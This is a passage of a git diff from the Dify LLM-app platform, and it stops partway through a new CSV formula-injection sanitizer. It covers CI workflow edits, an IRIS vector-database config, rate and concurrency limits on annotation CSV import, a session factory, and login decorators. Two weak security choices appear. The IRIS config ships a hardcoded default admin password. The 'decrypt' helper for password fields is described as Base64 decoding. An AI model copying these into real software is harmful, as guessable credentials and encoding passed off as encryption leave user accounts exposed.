diff --git a/.github/workflows/api-tests.yml b/.github/workflows/api-tests.yml index 557d747a8c..76cbf64fca 100644 --- a/.github/workflows/api-tests.yml +++ b/.github/workflows/api-tests.yml @@ -71,18 +71,18 @@ jobs: run: | cp api/tests/integration_tests/.env.example api/tests/integration_tests/.env - - name: Run Workflow - run: uv run --project api bash dev/pytest/pytest_workflow.sh - - - name: Run Tool - run: uv run --project api bash dev/pytest/pytest_tools.sh - - - name: Run TestContainers - run: uv run --project api bash dev/pytest/pytest_testcontainers.sh - - - name: Run Unit tests + - name: Run API Tests + env: + STORAGE_TYPE: opendal + OPENDAL_SCHEME: fs + OPENDAL_FS_ROOT: /tmp/dify-storage run: | - uv run --project api bash dev/pytest/pytest_unit_tests.sh + uv run --project api pytest \ + --timeout "${PYTEST_TIMEOUT:-180}" \ + api/tests/integration_tests/workflow \ + api/tests/integration_tests/tools \ + api/tests/test_containers_integration_tests \ + api/tests/unit_tests - name: Coverage Summary run: | @@ -93,5 +93,12 @@ jobs: # Create a detailed coverage summary echo "### Test Coverage Summary :test_tube:" >> $GITHUB_STEP_SUMMARY echo "Total Coverage: ${TOTAL_COVERAGE}%" >> $GITHUB_STEP_SUMMARY - uv run --project api coverage report --format=markdown >> $GITHUB_STEP_SUMMARY - + { + echo "" + echo "
<details><summary>File-level coverage (click to expand)</summary>" + echo "" + echo '```' + uv run --project api coverage report -m + echo '```' + echo "</details>
" + } >> $GITHUB_STEP_SUMMARY diff --git a/.github/workflows/autofix.yml b/.github/workflows/autofix.yml index 81392a9734..d7a58ce93d 100644 --- a/.github/workflows/autofix.yml +++ b/.github/workflows/autofix.yml @@ -13,11 +13,12 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 - - # Use uv to ensure we have the same ruff version in CI and locally. - - uses: astral-sh/setup-uv@v6 + - uses: actions/setup-python@v5 with: python-version: "3.11" + + - uses: astral-sh/setup-uv@v6 + - run: | cd api uv sync --dev @@ -35,10 +36,11 @@ jobs: - name: ast-grep run: | - uvx --from ast-grep-cli sg --pattern 'db.session.query($WHATEVER).filter($HERE)' --rewrite 'db.session.query($WHATEVER).where($HERE)' -l py --update-all - uvx --from ast-grep-cli sg --pattern 'session.query($WHATEVER).filter($HERE)' --rewrite 'session.query($WHATEVER).where($HERE)' -l py --update-all - uvx --from ast-grep-cli sg -p '$A = db.Column($$$B)' -r '$A = mapped_column($$$B)' -l py --update-all - uvx --from ast-grep-cli sg -p '$A : $T = db.Column($$$B)' -r '$A : $T = mapped_column($$$B)' -l py --update-all + # ast-grep exits 1 if no matches are found; allow idempotent runs. + uvx --from ast-grep-cli ast-grep --pattern 'db.session.query($WHATEVER).filter($HERE)' --rewrite 'db.session.query($WHATEVER).where($HERE)' -l py --update-all || true + uvx --from ast-grep-cli ast-grep --pattern 'session.query($WHATEVER).filter($HERE)' --rewrite 'session.query($WHATEVER).where($HERE)' -l py --update-all || true + uvx --from ast-grep-cli ast-grep -p '$A = db.Column($$$B)' -r '$A = mapped_column($$$B)' -l py --update-all || true + uvx --from ast-grep-cli ast-grep -p '$A : $T = db.Column($$$B)' -r '$A : $T = mapped_column($$$B)' -l py --update-all || true # Convert Optional[T] to T | None (ignoring quoted types) cat > /tmp/optional-rule.yml << 'EOF' id: convert-optional-to-union @@ -56,14 +58,15 @@ jobs: pattern: $T fix: $T | None EOF - uvx --from ast-grep-cli sg scan --inline-rules "$(cat /tmp/optional-rule.yml)" --update-all + uvx --from ast-grep-cli ast-grep scan . --inline-rules "$(cat /tmp/optional-rule.yml)" --update-all # Fix forward references that were incorrectly converted (Python doesn't support "Type" | None syntax) find . -name "*.py" -type f -exec sed -i.bak -E 's/"([^"]+)" \| None/Optional["\1"]/g; s/'"'"'([^'"'"']+)'"'"' \| None/Optional['"'"'\1'"'"']/g' {} \; find . -name "*.py.bak" -type f -delete + # mdformat breaks YAML front matter in markdown files. Add --exclude for directories containing YAML front matter. - name: mdformat run: | - uvx mdformat . + uvx --python 3.13 mdformat . --exclude ".claude/skills/**" - name: Install pnpm uses: pnpm/action-setup@v4 @@ -84,7 +87,6 @@ jobs: - name: oxlint working-directory: ./web - run: | - pnpx oxlint --fix + run: pnpm exec oxlint --config .oxlintrc.json --fix . - uses: autofix-ci/action@635ffb0c9798bd160680f18fd73371e355b85f27 diff --git a/.gitignore b/.gitignore index 79ba44b207..5ad728c3da 100644 --- a/.gitignore +++ b/.gitignore @@ -189,6 +189,7 @@ docker/volumes/matrixone/* docker/volumes/mysql/* docker/volumes/seekdb/* !docker/volumes/oceanbase/init.d +docker/volumes/iris/* docker/nginx/conf.d/default.conf docker/nginx/ssl/* diff --git a/.windsurf/rules/testing.md b/.windsurf/rules/testing.md deleted file mode 100644 index 64fec20cb8..0000000000 --- a/.windsurf/rules/testing.md +++ /dev/null @@ -1,5 +0,0 @@ -# Windsurf Testing Rules - -- Use `web/testing/testing.md` as the single source of truth for frontend automated testing. 
-- Honor every requirement in that document when generating or accepting tests. -- When proposing or saving tests, re-read that document and follow every requirement. diff --git a/api/.env.example b/api/.env.example index 516a119d98..4806429972 100644 --- a/api/.env.example +++ b/api/.env.example @@ -660,3 +660,14 @@ SINGLE_CHUNK_ATTACHMENT_LIMIT=10 ATTACHMENT_IMAGE_FILE_SIZE_LIMIT=2 ATTACHMENT_IMAGE_DOWNLOAD_TIMEOUT=60 IMAGE_FILE_BATCH_LIMIT=10 + +# Maximum allowed CSV file size for annotation import in megabytes +ANNOTATION_IMPORT_FILE_SIZE_LIMIT=2 +#Maximum number of annotation records allowed in a single import +ANNOTATION_IMPORT_MAX_RECORDS=10000 +# Minimum number of annotation records required in a single import +ANNOTATION_IMPORT_MIN_RECORDS=1 +ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE=5 +ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR=20 +# Maximum number of concurrent annotation import tasks per tenant +ANNOTATION_IMPORT_MAX_CONCURRENT=5 diff --git a/api/app_factory.py b/api/app_factory.py index 3a3ee03cff..026310a8aa 100644 --- a/api/app_factory.py +++ b/api/app_factory.py @@ -83,6 +83,7 @@ def initialize_extensions(app: DifyApp): ext_redis, ext_request_logging, ext_sentry, + ext_session_factory, ext_set_secretkey, ext_storage, ext_timezone, @@ -114,6 +115,7 @@ def initialize_extensions(app: DifyApp): ext_commands, ext_otel, ext_request_logging, + ext_session_factory, ] for ext in extensions: short_name = ext.__name__.split(".")[-1] diff --git a/api/configs/feature/__init__.py b/api/configs/feature/__init__.py index a5916241df..e16ca52f46 100644 --- a/api/configs/feature/__init__.py +++ b/api/configs/feature/__init__.py @@ -380,6 +380,37 @@ class FileUploadConfig(BaseSettings): default=60, ) + # Annotation Import Security Configurations + ANNOTATION_IMPORT_FILE_SIZE_LIMIT: NonNegativeInt = Field( + description="Maximum allowed CSV file size for annotation import in megabytes", + default=2, + ) + + ANNOTATION_IMPORT_MAX_RECORDS: PositiveInt = Field( + description="Maximum number of annotation records allowed in a single import", + default=10000, + ) + + ANNOTATION_IMPORT_MIN_RECORDS: PositiveInt = Field( + description="Minimum number of annotation records required in a single import", + default=1, + ) + + ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE: PositiveInt = Field( + description="Maximum number of annotation import requests per minute per tenant", + default=5, + ) + + ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR: PositiveInt = Field( + description="Maximum number of annotation import requests per hour per tenant", + default=20, + ) + + ANNOTATION_IMPORT_MAX_CONCURRENT: PositiveInt = Field( + description="Maximum number of concurrent annotation import tasks per tenant", + default=2, + ) + inner_UPLOAD_FILE_EXTENSION_BLACKLIST: str = Field( description=( "Comma-separated list of file extensions that are blocked from upload. 
" diff --git a/api/configs/middleware/__init__.py b/api/configs/middleware/__init__.py index a5e35c99ca..63f75924bf 100644 --- a/api/configs/middleware/__init__.py +++ b/api/configs/middleware/__init__.py @@ -26,6 +26,7 @@ from .vdb.clickzetta_config import ClickzettaConfig from .vdb.couchbase_config import CouchbaseConfig from .vdb.elasticsearch_config import ElasticsearchConfig from .vdb.huawei_cloud_config import HuaweiCloudConfig +from .vdb.iris_config import IrisVectorConfig from .vdb.lindorm_config import LindormConfig from .vdb.matrixone_config import MatrixoneConfig from .vdb.milvus_config import MilvusConfig @@ -106,7 +107,7 @@ class KeywordStoreConfig(BaseSettings): class DatabaseConfig(BaseSettings): # Database type selector - DB_TYPE: Literal["postgresql", "mysql", "oceanbase"] = Field( + DB_TYPE: Literal["postgresql", "mysql", "oceanbase", "seekdb"] = Field( description="Database type to use. OceanBase is MySQL-compatible.", default="postgresql", ) @@ -336,6 +337,7 @@ class MiddlewareConfig( ChromaConfig, ClickzettaConfig, HuaweiCloudConfig, + IrisVectorConfig, MilvusConfig, AlibabaCloudMySQLConfig, MyScaleConfig, diff --git a/api/configs/middleware/vdb/iris_config.py b/api/configs/middleware/vdb/iris_config.py new file mode 100644 index 0000000000..c532d191c3 --- /dev/null +++ b/api/configs/middleware/vdb/iris_config.py @@ -0,0 +1,91 @@ +"""Configuration for InterSystems IRIS vector database.""" + +from pydantic import Field, PositiveInt, model_validator +from pydantic_settings import BaseSettings + + +class IrisVectorConfig(BaseSettings): + """Configuration settings for IRIS vector database connection and pooling.""" + + IRIS_HOST: str | None = Field( + description="Hostname or IP address of the IRIS server.", + default="localhost", + ) + + IRIS_SUPER_SERVER_PORT: PositiveInt | None = Field( + description="Port number for IRIS connection.", + default=1972, + ) + + IRIS_USER: str | None = Field( + description="Username for IRIS authentication.", + default="_SYSTEM", + ) + + IRIS_PASSWORD: str | None = Field( + description="Password for IRIS authentication.", + default="Dify@1234", + ) + + IRIS_SCHEMA: str | None = Field( + description="Schema name for IRIS tables.", + default="dify", + ) + + IRIS_DATABASE: str | None = Field( + description="Database namespace for IRIS connection.", + default="USER", + ) + + IRIS_CONNECTION_URL: str | None = Field( + description="Full connection URL for IRIS (overrides individual fields if provided).", + default=None, + ) + + IRIS_MIN_CONNECTION: PositiveInt = Field( + description="Minimum number of connections in the pool.", + default=1, + ) + + IRIS_MAX_CONNECTION: PositiveInt = Field( + description="Maximum number of connections in the pool.", + default=3, + ) + + IRIS_TEXT_INDEX: bool = Field( + description="Enable full-text search index using %iFind.Index.Basic.", + default=True, + ) + + IRIS_TEXT_INDEX_LANGUAGE: str = Field( + description="Language for full-text search index (e.g., 'en', 'ja', 'zh', 'de').", + default="en", + ) + + @model_validator(mode="before") + @classmethod + def validate_config(cls, values: dict) -> dict: + """Validate IRIS configuration values. 
+ + Args: + values: Configuration dictionary + + Returns: + Validated configuration dictionary + + Raises: + ValueError: If required fields are missing or pool settings are invalid + """ + # Only validate required fields if IRIS is being used as the vector store + # This allows the config to be loaded even when IRIS is not in use + + # vector_store = os.environ.get("VECTOR_STORE", "") + # We rely on Pydantic defaults for required fields if they are missing from env. + # Strict existence check is removed to allow defaults to work. + + min_conn = values.get("IRIS_MIN_CONNECTION", 1) + max_conn = values.get("IRIS_MAX_CONNECTION", 3) + if min_conn > max_conn: + raise ValueError("IRIS_MIN_CONNECTION must be less than or equal to IRIS_MAX_CONNECTION") + + return values diff --git a/api/controllers/console/admin.py b/api/controllers/console/admin.py index 7aa1e6dbd8..a25ca5ef51 100644 --- a/api/controllers/console/admin.py +++ b/api/controllers/console/admin.py @@ -6,19 +6,20 @@ from flask import request from flask_restx import Resource from pydantic import BaseModel, Field, field_validator from sqlalchemy import select -from sqlalchemy.orm import Session from werkzeug.exceptions import NotFound, Unauthorized -P = ParamSpec("P") -R = TypeVar("R") from configs import dify_config from constants.languages import supported_language from controllers.console import console_ns from controllers.console.wraps import only_edition_cloud +from core.db.session_factory import session_factory from extensions.ext_database import db from libs.token import extract_access_token from models.model import App, InstalledApp, RecommendedApp +P = ParamSpec("P") +R = TypeVar("R") + DEFAULT_REF_TEMPLATE_SWAGGER_2_0 = "#/definitions/{model}" @@ -90,7 +91,7 @@ class InsertExploreAppListApi(Resource): privacy_policy = site.privacy_policy or payload.privacy_policy or "" custom_disclaimer = site.custom_disclaimer or payload.custom_disclaimer or "" - with Session(db.engine) as session: + with session_factory.create_session() as session: recommended_app = session.execute( select(RecommendedApp).where(RecommendedApp.app_id == payload.app_id) ).scalar_one_or_none() @@ -138,7 +139,7 @@ class InsertExploreAppApi(Resource): @only_edition_cloud @admin_required def delete(self, app_id): - with Session(db.engine) as session: + with session_factory.create_session() as session: recommended_app = session.execute( select(RecommendedApp).where(RecommendedApp.app_id == str(app_id)) ).scalar_one_or_none() @@ -146,13 +147,13 @@ class InsertExploreAppApi(Resource): if not recommended_app: return {"result": "success"}, 204 - with Session(db.engine) as session: + with session_factory.create_session() as session: app = session.execute(select(App).where(App.id == recommended_app.app_id)).scalar_one_or_none() if app: app.is_public = False - with Session(db.engine) as session: + with session_factory.create_session() as session: installed_apps = ( session.execute( select(InstalledApp).where( diff --git a/api/controllers/console/app/annotation.py b/api/controllers/console/app/annotation.py index 3b6fb58931..6a4c1528b0 100644 --- a/api/controllers/console/app/annotation.py +++ b/api/controllers/console/app/annotation.py @@ -1,6 +1,6 @@ from typing import Any, Literal -from flask import request +from flask import abort, make_response, request from flask_restx import Resource, fields, marshal, marshal_with from pydantic import BaseModel, Field, field_validator @@ -8,6 +8,8 @@ from controllers.common.errors import NoFileUploadedError, TooManyFilesError from 
controllers.console import console_ns from controllers.console.wraps import ( account_initialization_required, + annotation_import_concurrency_limit, + annotation_import_rate_limit, cloud_edition_billing_resource_check, edit_permission_required, setup_required, @@ -257,7 +259,7 @@ class AnnotationApi(Resource): @console_ns.route("/apps//annotations/export") class AnnotationExportApi(Resource): @console_ns.doc("export_annotations") - @console_ns.doc(description="Export all annotations for an app") + @console_ns.doc(description="Export all annotations for an app with CSV injection protection") @console_ns.doc(params={"app_id": "Application ID"}) @console_ns.response( 200, @@ -272,8 +274,14 @@ class AnnotationExportApi(Resource): def get(self, app_id): app_id = str(app_id) annotation_list = AppAnnotationService.export_annotation_list_by_app_id(app_id) - response = {"data": marshal(annotation_list, annotation_fields)} - return response, 200 + response_data = {"data": marshal(annotation_list, annotation_fields)} + + # Create response with secure headers for CSV export + response = make_response(response_data, 200) + response.headers["Content-Type"] = "application/json; charset=utf-8" + response.headers["X-Content-Type-Options"] = "nosniff" + + return response @console_ns.route("/apps//annotations/") @@ -314,18 +322,25 @@ class AnnotationUpdateDeleteApi(Resource): @console_ns.route("/apps//annotations/batch-import") class AnnotationBatchImportApi(Resource): @console_ns.doc("batch_import_annotations") - @console_ns.doc(description="Batch import annotations from CSV file") + @console_ns.doc(description="Batch import annotations from CSV file with rate limiting and security checks") @console_ns.doc(params={"app_id": "Application ID"}) @console_ns.response(200, "Batch import started successfully") @console_ns.response(403, "Insufficient permissions") @console_ns.response(400, "No file uploaded or too many files") + @console_ns.response(413, "File too large") + @console_ns.response(429, "Too many requests or concurrent imports") @setup_required @login_required @account_initialization_required @cloud_edition_billing_resource_check("annotation") + @annotation_import_rate_limit + @annotation_import_concurrency_limit @edit_permission_required def post(self, app_id): + from configs import dify_config + app_id = str(app_id) + # check file if "file" not in request.files: raise NoFileUploadedError() @@ -335,9 +350,27 @@ class AnnotationBatchImportApi(Resource): # get file from request file = request.files["file"] + # check file type if not file.filename or not file.filename.lower().endswith(".csv"): raise ValueError("Invalid file type. Only CSV files are allowed") + + # Check file size before processing + file.seek(0, 2) # Seek to end of file + file_size = file.tell() + file.seek(0) # Reset to beginning + + max_size_bytes = dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT * 1024 * 1024 + if file_size > max_size_bytes: + abort( + 413, + f"File size exceeds maximum limit of {dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT}MB. 
" + f"Please reduce the file size and try again.", + ) + + if file_size == 0: + raise ValueError("The uploaded file is empty") + return AppAnnotationService.batch_import_app_annotations(app_id, file) diff --git a/api/controllers/console/auth/login.py b/api/controllers/console/auth/login.py index f486f4c313..772d98822e 100644 --- a/api/controllers/console/auth/login.py +++ b/api/controllers/console/auth/login.py @@ -22,7 +22,12 @@ from controllers.console.error import ( NotAllowedCreateWorkspace, WorkspacesLimitExceeded, ) -from controllers.console.wraps import email_password_login_enabled, setup_required +from controllers.console.wraps import ( + decrypt_code_field, + decrypt_password_field, + email_password_login_enabled, + setup_required, +) from events.tenant_event import tenant_was_created from libs.helper import EmailStr, extract_remote_ip from libs.login import current_account_with_tenant @@ -79,6 +84,7 @@ class LoginApi(Resource): @setup_required @email_password_login_enabled @console_ns.expect(console_ns.models[LoginPayload.__name__]) + @decrypt_password_field def post(self): """Authenticate user and login.""" args = LoginPayload.model_validate(console_ns.payload) @@ -218,6 +224,7 @@ class EmailCodeLoginSendEmailApi(Resource): class EmailCodeLoginApi(Resource): @setup_required @console_ns.expect(console_ns.models[EmailCodeLoginPayload.__name__]) + @decrypt_code_field def post(self): args = EmailCodeLoginPayload.model_validate(console_ns.payload) diff --git a/api/controllers/console/datasets/data_source.py b/api/controllers/console/datasets/data_source.py index 01f268d94d..cd958bbb36 100644 --- a/api/controllers/console/datasets/data_source.py +++ b/api/controllers/console/datasets/data_source.py @@ -140,6 +140,18 @@ class DataSourceNotionListApi(Resource): credential_id = request.args.get("credential_id", default=None, type=str) if not credential_id: raise ValueError("Credential id is required.") + + # Get datasource_parameters from query string (optional, for GitHub and other datasources) + datasource_parameters_str = request.args.get("datasource_parameters", default=None, type=str) + datasource_parameters = {} + if datasource_parameters_str: + try: + datasource_parameters = json.loads(datasource_parameters_str) + if not isinstance(datasource_parameters, dict): + raise ValueError("datasource_parameters must be a JSON object.") + except json.JSONDecodeError: + raise ValueError("Invalid datasource_parameters JSON format.") + datasource_provider_service = DatasourceProviderService() credential = datasource_provider_service.get_datasource_credentials( tenant_id=current_tenant_id, @@ -187,7 +199,7 @@ class DataSourceNotionListApi(Resource): online_document_result: Generator[OnlineDocumentPagesMessage, None, None] = ( datasource_runtime.get_online_document_pages( user_id=current_user.id, - datasource_parameters={}, + datasource_parameters=datasource_parameters, provider_type=datasource_runtime.datasource_provider_type(), ) ) @@ -218,14 +230,14 @@ class DataSourceNotionListApi(Resource): @console_ns.route( - "/notion/workspaces//pages///preview", + "/notion/pages///preview", "/datasets/notion-indexing-estimate", ) class DataSourceNotionApi(Resource): @setup_required @login_required @account_initialization_required - def get(self, workspace_id, page_id, page_type): + def get(self, page_id, page_type): _, current_tenant_id = current_account_with_tenant() credential_id = request.args.get("credential_id", default=None, type=str) @@ -239,11 +251,10 @@ class DataSourceNotionApi(Resource): 
plugin_id="langgenius/notion_datasource", ) - workspace_id = str(workspace_id) page_id = str(page_id) extractor = NotionExtractor( - notion_workspace_id=workspace_id, + notion_workspace_id="", notion_obj_id=page_id, notion_page_type=page_type, notion_access_token=credential.get("integration_secret"), diff --git a/api/controllers/console/datasets/datasets.py b/api/controllers/console/datasets/datasets.py index 70b6e932e9..ea21c4480d 100644 --- a/api/controllers/console/datasets/datasets.py +++ b/api/controllers/console/datasets/datasets.py @@ -223,6 +223,7 @@ def _get_retrieval_methods_by_vector_type(vector_type: str | None, is_mock: bool VectorType.COUCHBASE, VectorType.OPENGAUSS, VectorType.OCEANBASE, + VectorType.SEEKDB, VectorType.TABLESTORE, VectorType.HUAWEI_CLOUD, VectorType.TENCENT, @@ -230,6 +231,7 @@ def _get_retrieval_methods_by_vector_type(vector_type: str | None, is_mock: bool VectorType.CLICKZETTA, VectorType.BAIDU, VectorType.ALIBABACLOUD_MYSQL, + VectorType.IRIS, } semantic_methods = {"retrieval_method": [RetrievalMethod.SEMANTIC_SEARCH.value]} diff --git a/api/controllers/console/datasets/rag_pipeline/rag_pipeline_workflow.py b/api/controllers/console/datasets/rag_pipeline/rag_pipeline_workflow.py index debe8eed97..46d67f0581 100644 --- a/api/controllers/console/datasets/rag_pipeline/rag_pipeline_workflow.py +++ b/api/controllers/console/datasets/rag_pipeline/rag_pipeline_workflow.py @@ -4,7 +4,7 @@ from typing import Any, Literal, cast from uuid import UUID from flask import abort, request -from flask_restx import Resource, marshal_with # type: ignore +from flask_restx import Resource, marshal_with, reqparse # type: ignore from pydantic import BaseModel, Field from sqlalchemy.orm import Session from werkzeug.exceptions import Forbidden, InternalServerError, NotFound @@ -975,6 +975,11 @@ class RagPipelineRecommendedPluginApi(Resource): @login_required @account_initialization_required def get(self): + parser = reqparse.RequestParser() + parser.add_argument("type", type=str, location="args", required=False, default="all") + args = parser.parse_args() + type = args["type"] + rag_pipeline_service = RagPipelineService() - recommended_plugins = rag_pipeline_service.get_recommended_plugins() + recommended_plugins = rag_pipeline_service.get_recommended_plugins(type) return recommended_plugins diff --git a/api/controllers/console/wraps.py b/api/controllers/console/wraps.py index f40f566a36..95fc006a12 100644 --- a/api/controllers/console/wraps.py +++ b/api/controllers/console/wraps.py @@ -9,10 +9,12 @@ from typing import ParamSpec, TypeVar from flask import abort, request from configs import dify_config +from controllers.console.auth.error import AuthenticationFailedError, EmailCodeError from controllers.console.workspace.error import AccountNotInitializedError from enums.cloud_plan import CloudPlan from extensions.ext_database import db from extensions.ext_redis import redis_client +from libs.encryption import FieldEncryption from libs.login import current_account_with_tenant from models.account import AccountStatus from models.dataset import RateLimitLog @@ -25,6 +27,14 @@ from .error import NotInitValidateError, NotSetupError, UnauthorizedAndForceLogo P = ParamSpec("P") R = TypeVar("R") +# Field names for decryption +FIELD_NAME_PASSWORD = "password" +FIELD_NAME_CODE = "code" + +# Error messages for decryption failures +ERROR_MSG_INVALID_ENCRYPTED_DATA = "Invalid encrypted data" +ERROR_MSG_INVALID_ENCRYPTED_CODE = "Invalid encrypted code" + def 
account_initialization_required(view: Callable[P, R]): @wraps(view) @@ -331,3 +341,163 @@ def is_admin_or_owner_required(f: Callable[P, R]): return f(*args, **kwargs) return decorated_function + + +def annotation_import_rate_limit(view: Callable[P, R]): + """ + Rate limiting decorator for annotation import operations. + + Implements sliding window rate limiting with two tiers: + - Short-term: Configurable requests per minute (default: 5) + - Long-term: Configurable requests per hour (default: 20) + + Uses Redis ZSET for distributed rate limiting across multiple instances. + """ + + @wraps(view) + def decorated(*args: P.args, **kwargs: P.kwargs): + _, current_tenant_id = current_account_with_tenant() + current_time = int(time.time() * 1000) + + # Check per-minute rate limit + minute_key = f"annotation_import_rate_limit:{current_tenant_id}:1min" + redis_client.zadd(minute_key, {current_time: current_time}) + redis_client.zremrangebyscore(minute_key, 0, current_time - 60000) + minute_count = redis_client.zcard(minute_key) + redis_client.expire(minute_key, 120) # 2 minutes TTL + + if minute_count > dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE: + abort( + 429, + f"Too many annotation import requests. Maximum {dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE} " + f"requests per minute allowed. Please try again later.", + ) + + # Check per-hour rate limit + hour_key = f"annotation_import_rate_limit:{current_tenant_id}:1hour" + redis_client.zadd(hour_key, {current_time: current_time}) + redis_client.zremrangebyscore(hour_key, 0, current_time - 3600000) + hour_count = redis_client.zcard(hour_key) + redis_client.expire(hour_key, 7200) # 2 hours TTL + + if hour_count > dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR: + abort( + 429, + f"Too many annotation import requests. Maximum {dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR} " + f"requests per hour allowed. Please try again later.", + ) + + return view(*args, **kwargs) + + return decorated + + +def annotation_import_concurrency_limit(view: Callable[P, R]): + """ + Concurrency control decorator for annotation import operations. + + Limits the number of concurrent import tasks per tenant to prevent + resource exhaustion and ensure fair resource allocation. + + Uses Redis ZSET to track active import jobs with automatic cleanup + of stale entries (jobs older than 2 minutes). + """ + + @wraps(view) + def decorated(*args: P.args, **kwargs: P.kwargs): + _, current_tenant_id = current_account_with_tenant() + current_time = int(time.time() * 1000) + + active_jobs_key = f"annotation_import_active:{current_tenant_id}" + + # Clean up stale entries (jobs that should have completed or timed out) + stale_threshold = current_time - 120000 # 2 minutes ago + redis_client.zremrangebyscore(active_jobs_key, 0, stale_threshold) + + # Check current active job count + active_count = redis_client.zcard(active_jobs_key) + + if active_count >= dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT: + abort( + 429, + f"Too many concurrent import tasks. Maximum {dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT} " + f"concurrent imports allowed per workspace. Please wait for existing imports to complete.", + ) + + # Allow the request to proceed + # The actual job registration will happen in the service layer + return view(*args, **kwargs) + + return decorated + + +def _decrypt_field(field_name: str, error_class: type[Exception], error_message: str) -> None: + """ + Helper to decode a Base64 encoded field in the request payload. 
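+ The decoded value is written back onto Flask's cached JSON payload in place, so all later reads (including console_ns.payload) observe the plaintext value.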
+ + Args: + field_name: Name of the field to decode + error_class: Exception class to raise on decoding failure + error_message: Error message to include in the exception + """ + if not request or not request.is_json: + return + # Get the payload dict - it's cached and mutable + payload = request.get_json() + if not payload or field_name not in payload: + return + encoded_value = payload[field_name] + decoded_value = FieldEncryption.decrypt_field(encoded_value) + + # If decoding failed, raise error immediately + if decoded_value is None: + raise error_class(error_message) + + # Update payload dict in-place with decoded value + # Since payload is a mutable dict and get_json() returns the cached reference, + # modifying it will affect all subsequent accesses including console_ns.payload + payload[field_name] = decoded_value + + +def decrypt_password_field(view: Callable[P, R]): + """ + Decorator to decrypt password field in request payload. + + Automatically decrypts the 'password' field if encryption is enabled. + If decryption fails, raises AuthenticationFailedError. + + Usage: + @decrypt_password_field + def post(self): + args = LoginPayload.model_validate(console_ns.payload) + # args.password is now decrypted + """ + + @wraps(view) + def decorated(*args: P.args, **kwargs: P.kwargs): + _decrypt_field(FIELD_NAME_PASSWORD, AuthenticationFailedError, ERROR_MSG_INVALID_ENCRYPTED_DATA) + return view(*args, **kwargs) + + return decorated + + +def decrypt_code_field(view: Callable[P, R]): + """ + Decorator to decrypt verification code field in request payload. + + Automatically decrypts the 'code' field if encryption is enabled. + If decryption fails, raises EmailCodeError. + + Usage: + @decrypt_code_field + def post(self): + args = EmailCodeLoginPayload.model_validate(console_ns.payload) + # args.code is now decrypted + """ + + @wraps(view) + def decorated(*args: P.args, **kwargs: P.kwargs): + _decrypt_field(FIELD_NAME_CODE, EmailCodeError, ERROR_MSG_INVALID_ENCRYPTED_CODE) + return view(*args, **kwargs) + + return decorated diff --git a/api/controllers/service_api/app/completion.py b/api/controllers/service_api/app/completion.py index b7fb01c6fe..b3836f3a47 100644 --- a/api/controllers/service_api/app/completion.py +++ b/api/controllers/service_api/app/completion.py @@ -61,6 +61,9 @@ class ChatRequestPayload(BaseModel): @classmethod def normalize_conversation_id(cls, value: str | UUID | None) -> str | None: """Allow missing or blank conversation IDs; enforce UUID format when provided.""" + if isinstance(value, str): + value = value.strip() + if not value: return None diff --git a/api/core/db/__init__.py b/api/core/db/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/api/core/db/session_factory.py b/api/core/db/session_factory.py new file mode 100644 index 0000000000..1dae2eafd4 --- /dev/null +++ b/api/core/db/session_factory.py @@ -0,0 +1,38 @@ +from sqlalchemy import Engine +from sqlalchemy.orm import Session, sessionmaker + +_session_maker: sessionmaker | None = None + + +def configure_session_factory(engine: Engine, expire_on_commit: bool = False): + """Configure the global session factory""" + global _session_maker + _session_maker = sessionmaker(bind=engine, expire_on_commit=expire_on_commit) + + +def get_session_maker() -> sessionmaker: + if _session_maker is None: + raise RuntimeError("Session factory not configured. 
Call configure_session_factory() first.") + return _session_maker + + +def create_session() -> Session: + return get_session_maker()() + + +# Class wrapper for convenience +class SessionFactory: + @staticmethod + def configure(engine: Engine, expire_on_commit: bool = False): + configure_session_factory(engine, expire_on_commit) + + @staticmethod + def get_session_maker() -> sessionmaker: + return get_session_maker() + + @staticmethod + def create_session() -> Session: + return create_session() + + +session_factory = SessionFactory() diff --git a/api/core/entities/knowledge_entities.py b/api/core/entities/knowledge_entities.py index bed3a35400..d4093b5245 100644 --- a/api/core/entities/knowledge_entities.py +++ b/api/core/entities/knowledge_entities.py @@ -1,4 +1,4 @@ -from pydantic import BaseModel, Field +from pydantic import BaseModel, Field, field_validator class PreviewDetail(BaseModel): @@ -20,9 +20,17 @@ class IndexingEstimate(BaseModel): class PipelineDataset(BaseModel): id: str name: str - description: str | None = Field(default="", description="knowledge dataset description") + description: str = Field(default="", description="knowledge dataset description") chunk_structure: str + @field_validator("description", mode="before") + @classmethod + def normalize_description(cls, value: str | None) -> str: + """Coerce None to empty string so description is always a string.""" + if value is None: + return "" + return value + class PipelineDocument(BaseModel): id: str diff --git a/api/core/helper/csv_sanitizer.py b/api/core/helper/csv_sanitizer.py new file mode 100644 index 0000000000..0023de5a35 --- /dev/null +++ b/api/core/helper/csv_sanitizer.py @@ -0,0 +1,89 @@ +"""CSV sanitization utilities to prevent formula injection attacks.""" + +from typing import Any + + +class CSVSanitizer: + """ + Sanitizer for CSV export to prevent formula injection attacks. + + This class provides methods to sanitize data before CSV export by escaping + characters that could be interpreted as formulas by spreadsheet applications + (Excel, LibreOffice, Google Sheets). + + Formula injection occurs when user-controlled data starting with special + characters (=, +, -, @, tab, carriage return) is exported to CSV and opened + in a spreadsheet application, potentially executing malicious commands. + """ + + # Characters that can start a formula in Excel/LibreOffice/Google Sheets + FORMULA_CHARS = frozenset({"=", "+", "-", "@", "\t", "\r"}) + + @classmethod + def sanitize_value(cls, value: Any) -> str: + """ + Sanitize a value for safe CSV export. + + Prefixes formula-initiating characters with a single quote to prevent + Excel/LibreOffice/Google Sheets from treating them as formulas. + + Args: + value: The value to sanitize (will be converted to string) + + Returns: + Sanitized string safe for CSV export + + Examples: + >>> CSVSanitizer.sanitize_value("=1+1") + "'=1+1" + >>> CSVSanitizer.sanitize_value("Hello World") + "Hello World" + >>> CSVSanitizer.sanitize_value(None) + "" + """ + if value is None: + return "" + + # Convert to string + 